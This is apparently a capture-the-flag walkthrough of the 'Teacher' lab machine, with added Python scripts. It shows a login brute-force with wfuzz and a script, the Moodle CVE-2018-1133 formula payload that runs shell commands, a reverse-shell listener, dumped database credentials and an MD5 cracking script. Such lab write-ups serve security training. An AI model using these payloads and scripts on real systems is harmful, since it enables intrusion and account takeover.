Clicking on the highlighted links does nothing at all.
Looking closely at the page source, we notice something odd about images/5.png.
Looking at the browser console, we can see that every time we click on a link, the message "That's an F" shows up.
Checking http://10.10.10.153/images, we can see that this file does not follow the naming convention of the other images. Let's download it.
Inspecting the downloaded file shows it is not an image at all but plain text (see the file and cat output below).
It seems we might be able to log in somewhere using the username Giovanni, as long as we can figure out the last character of the password (the note says "character", not digit, so the missing symbol need not be numeric) and find the login page.
From the output of gobuster, we can see it found /moodle; browsing to it shows a page where we can possibly log in. We can also notice the user Giovanni Chhatta.
Guessing the Password with Burp
I captured the login POST request and sent it to Intruder, with the payload position on the last character of the password.
I used the following payload list from SecLists: /usr/share/seclists/Fuzzing/special-chars.txt. Burp shows a hit for #, the one response whose length differs from the failed-login page.
This can also be done using wfuzz
Now we are going to try to log in to the web application as:
# Nmap 7.80 scan initiated Thu Mar 26 22:11:59 2020 as: nmap -sC -sV -p 80 -oA nmap/Teacher 10.10.10.153
Nmap scan report for 10.10.10.153
Host is up (0.066s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Blackhat highschool
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Mar 26 22:12:09 2020 -- 1 IP address (1 host up) scanned in 10.53 seconds
# Download it with wget
wget http://10.10.10.153/images/5.png
# Checking the file
file 5.png
5.png: ASCII text
# Contents
cat 5.png
Hi Servicedesk,
I forgot the last charachter of my password. The only part I remembered is Th4C00lTheacha.
Could you guys figure out what the last charachter is, or just reset it?
Thanks,
Giovanni
wfuzz -L --hh 27142 -w /usr/share/seclists/Fuzzing/special-chars.txt -d "anchor=&username=giovanni&password=Th4C00lTheachaFUZZ" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" -u http://10.10.10.153/moodle/login/index.php
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.153/moodle/login/index.php
Total requests: 32
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000004: 200 296 L 1258 W 27575 Ch "#"
Total time: 3.765820
Processed Requests: 32
Filtered Requests: 31
Requests/sec.: 8.497483
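The same last-character guess as a small Python script, added here as an example and not part of the original writeup. It reproduces the wfuzz run above (same form fields, same rule that any response differing from the failed-login response is the hit) with a pluggable transport, so the logic can be run offline against a constructed stand-in for the login form. Everything not in the writeup is an assumption: the urllib transport, the printable-ASCII charset, and FakeMoodle, whose two body sizes are copied from the wfuzz output above.

```python
import string
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Iterable, Optional, Tuple

LOGIN_URL = "http://10.10.10.153/moodle/login/index.php"  # target from the writeup
USERNAME = "giovanni"                                      # from the note in 5.png
KNOWN_PREFIX = "Th4C00lTheacha"                            # from the note in 5.png

# Characters to try for the single missing position. The writeup used
# SecLists' special-chars.txt; printable ASCII (95 chars) is a superset.
CANDIDATES = string.printable.strip()

Response = Tuple[int, int]                 # (HTTP status, body length in bytes)
Sender = Callable[[str, str], Response]    # (username, password) -> Response


def http_sender(url: str = LOGIN_URL, timeout: float = 10.0) -> Sender:
    """Build a sender that POSTs the same form fields as the wfuzz command.

    urllib follows redirects, so a successful Moodle login (303 to the
    dashboard) comes back as the dashboard page rather than the login page,
    and its body length differs from the failed-login page.
    """
    def send(username: str, password: str) -> Response:
        data = urllib.parse.urlencode(
            {"anchor": "", "username": username, "password": password}
        ).encode()
        req = urllib.request.Request(url, data=data, method="POST")
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                return resp.status, len(resp.read())
        except urllib.error.HTTPError as err:
            return err.code, len(err.read())
    return send


def find_last_char(send: Sender, username: str = USERNAME,
                   prefix: str = KNOWN_PREFIX,
                   charset: Iterable[str] = CANDIDATES) -> Optional[str]:
    """Return the character whose login response differs from the failure baseline.

    The baseline is a password that is certainly wrong: exactly one character
    is missing, so appending two cannot be right. Any candidate whose
    (status, length) differs from the baseline is reported as the hit, the
    same rule wfuzz applied with --hh 27142. Confirm the hit with a manual
    login: anything else that changes the page (a lockout notice, say) would
    also register as a difference. Moodle can lock an account after repeated
    failures (lockoutthreshold, off by default), so keep the charset as
    small as the evidence allows.
    """
    baseline = send(username, prefix + "??")
    for ch in charset:
        if send(username, prefix + ch) != baseline:
            return ch
    return None


class FakeMoodle:
    """Constructed stand-in for the login form so the logic runs offline.

    The two body sizes are the ones visible in the wfuzz output above:
    27142 bytes for a failed login, 27575 for the page after a successful one.
    """
    CORRECT = {USERNAME: KNOWN_PREFIX + "#"}   # the answer the writeup found

    def __init__(self) -> None:
        self.attempts = 0

    def send(self, username: str, password: str) -> Response:
        self.attempts += 1
        if self.CORRECT.get(username) == password:
            return 200, 27575
        return 200, 27142


if __name__ == "__main__":
    fake = FakeMoodle()
    hit = find_last_char(fake.send)
    print(f"last character: {hit!r} after {fake.attempts} requests")
    # Against the live box: find_last_char(http_sender())
```

Swapping FakeMoodle().send for http_sender() is the only change needed to run it against the target; the detection rule is deliberately the crude "differs from baseline" test that wfuzz and Intruder use, so a hit still needs to be confirmed by logging in by hand.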
Formula submitted in a Moodle calculated question (CVE-2018-1133, "Evil Teacher"). When Moodle evaluates the formula with PHP, /*{a*/ is a block comment and //{x}} is a line comment, so the only statement left for PHP to execute is the backtick expression around $_GET[0]; PHP's backtick operator runs its contents as a shell command, so whatever is passed in the 0 query parameter executes as www-data. Here it was used to start a reverse shell to the listener below:
/*{a*/`$_GET[0]`;//{x}}
rlwrap nc -lnvp 9001
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.153.
Ncat: Connection from 10.10.10.153:33758.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@teacher:/var/www/html/moodle$ cat config.php
cat config.php
<?php // Moodle configuration file
unset($CFG);
global $CFG;
$CFG = new stdClass();
$CFG->dbtype = 'mariadb';
$CFG->dblibrary = 'native';
$CFG->dbhost = 'localhost';
$CFG->dbname = 'moodle';
$CFG->dbuser = 'root';
$CFG->dbpass = 'Welkom1!';
$CFG->prefix = 'mdl_';
$CFG->dboptions = array (
'dbpersist' => 0,
'dbport' => 3306,
'dbsocket' => '',
'dbcollation' => 'utf8mb4_unicode_ci',
);
$CFG->wwwroot = 'http://10.10.10.153/moodle';
$CFG->dataroot = '/var/www/moodledata';
$CFG->admin = 'admin';
$CFG->directorypermissions = 0777;
require_once(__DIR__ . '/lib/setup.php');
// There is no php closing tag in this file,
// it is intentional because it prevents trailing whitespace problems!
MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| moodle |
| mysql |
| performance_schema |
| phpmyadmin |
+--------------------+
5 rows in set (0.00 sec)
MariaDB [(none)]>
Hash                               Type   Result
7a860966115182402ed06375cf0a22af   md5    expelled
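A small dictionary cracker for that hash, added here as an example and not the tool the writeup used. It tries each word as plain MD5 and, optionally, in the md5(password . passwordsaltmain) layout Moodle used before it moved to bcrypt, and refuses hashes that are not raw MD5. The hash is the one from the table above; the sample wordlist is constructed so the block runs offline.

```python
import hashlib
from typing import Iterable, Optional

# Hash pulled from the Moodle database in the writeup.
GIOVANNI_MD5 = "7a860966115182402ed06375cf0a22af"

# Constructed wordlist so the example runs offline; against a real hash use
# rockyou.txt or a similar list.
SAMPLE_WORDLIST = ["password", "teacher", "moodle", "Welkom1!", "expelled", "giovanni"]


def md5_hex(word: str, salt: str = "") -> str:
    """md5(word . salt): the layout of Moodle's legacy (pre-bcrypt) password
    hashes, with $CFG->passwordsaltmain as the salt. An empty salt is plain MD5."""
    return hashlib.md5((word + salt).encode("utf-8")).hexdigest()


def looks_like_md5(digest: str) -> bool:
    return len(digest) == 32 and all(c in "0123456789abcdef" for c in digest.lower())


def crack_md5(target: str, words: Iterable[str],
              salts: Iterable[str] = ("",)) -> Optional[str]:
    """Dictionary attack on an MD5 digest, optionally with Moodle-style salts.

    Raises ValueError for anything that is not a raw MD5 hex digest; current
    Moodle hashes start with $2y$ (bcrypt) and belong in hashcat or john, not
    here. The config.php above sets no passwordsaltmain, so the default tries
    only the unsalted form.
    """
    if not looks_like_md5(target):
        raise ValueError("not a raw MD5 hex digest")
    target = target.lower()
    salts = tuple(salts)
    for word in words:
        word = word.rstrip("\r\n")      # lets an open file object be passed directly
        for salt in salts:
            if md5_hex(word, salt) == target:
                return word
    return None


if __name__ == "__main__":
    print(crack_md5(GIOVANNI_MD5, SAMPLE_WORDLIST))
    # Real run:
    # crack_md5(GIOVANNI_MD5, open("/usr/share/wordlists/rockyou.txt", encoding="latin-1"))
```

If a Moodle instance does set passwordsaltmain in config.php, pass it via salts=[...]; without it a legacy hash will never match, which is the usual reason an "md5" hash from a Moodle database refuses to crack.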
www-data@teacher:/var/www/html/moodle$ su - giovanni
su - giovanni
Password: expelled
giovanni@teacher:~$ id
id
uid=1000(giovanni) gid=1000(giovanni) groups=1000(giovanni)
giovanni@teacher:~$
giovanni@teacher:~$ find . -ls
find . -ls
1055165 4 drwxr-x--- 4 giovanni giovanni 4096 Nov 4 2018 .
1055175 4 drwxrwxrwx 2 giovanni giovanni 4096 Jun 27 2018 ./.nano
1055166 4 -rw-r--r-- 1 giovanni giovanni 220 Jun 27 2018 ./.bash_logout
1048578 4 -rw------- 1 giovanni giovanni 1 Nov 4 2018 ./.bash_history
1055158 4 -rw-r--r-- 1 giovanni giovanni 33 Jun 27 2018 ./user.txt
1055167 4 -rw-r--r-- 1 giovanni giovanni 3526 Jun 27 2018 ./.bashrc
1055168 4 -rw-r--r-- 1 giovanni giovanni 675 Jun 27 2018 ./.profile
1048592 4 drwxr-xr-x 4 giovanni giovanni 4096 Jun 27 2018 ./work
1055164 4 drwxr-xr-x 3 giovanni giovanni 4096 Jun 27 2018 ./work/tmp
1055172 4 drwxrwxrwx 3 root root 4096 Jun 27 2018 ./work/tmp/courses
1055178 4 drwxrwxrwx 2 root root 4096 Jun 27 2018 ./work/tmp/courses/algebra
1048590 4 -rwxrwxrwx 1 giovanni giovanni 109 Jun 27 2018 ./work/tmp/courses/algebra/answersAlgebra
1055171 4 -rwxrwxrwx 1 root root 256 Apr 21 21:22 ./work/tmp/backup_courses.tar.gz
1055163 4 drwxr-xr-x 3 giovanni giovanni 4096 Jun 27 2018 ./work/courses
1055162 4 drwxr-xr-x 2 root root 4096 Jun 27 2018 ./work/courses/algebra
1055169 4 -rw-r--r-- 1 giovanni giovanni 109 Jun 27 2018 ./work/courses/algebra/answersAlgebra